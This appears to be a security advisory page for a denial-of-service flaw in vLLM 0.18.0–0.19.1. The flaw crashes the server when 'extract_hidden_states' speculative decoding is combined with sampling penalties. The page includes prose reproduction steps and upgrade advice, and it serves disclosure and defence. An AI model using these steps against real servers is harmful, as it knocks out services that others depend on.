vLLM
cpe:2.3:a:vllm:vllm:*:*:*:*:*:*:*
- >= 0.18.0, <= 0.19.1
A vulnerability in vLLM, an inference engine for large language models, causes the server to crash when using the 'extract_hidden_states' speculative decoding method with certain penalty parameters. This issue affects vLLM versions 0.18.0 prior to 0.20.0. The crash occurs because the 'extract_hidden_states' proposer returns a tensor with an incorrect shape after the first decoding step, leading to a shape mismatch error. The problem is triggered immediately and consistently when any request in a batch includes a sampling penalty, such as 'repetition_penalty', 'frequency_penalty', or 'presence_penalty'.
Exploiting this vulnerability causes the EngineCore process to crash, leading to a complete loss of service availability.
To reproduce this vulnerability, send a batch request to a vLLM server running a vulnerable version with the 'extract_hidden_states' speculative decoding method enabled. Ensure that at least one request in the batch includes a sampling penalty parameter, such as 'repetition_penalty'. The server will crash immediately after processing the request with the penalty parameter.
Upgrade to vLLM version 0.20.0 or later. If an upgrade is not possible, avoid using the 'extract_hidden_states' method with penalty parameters on affected versions.
Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.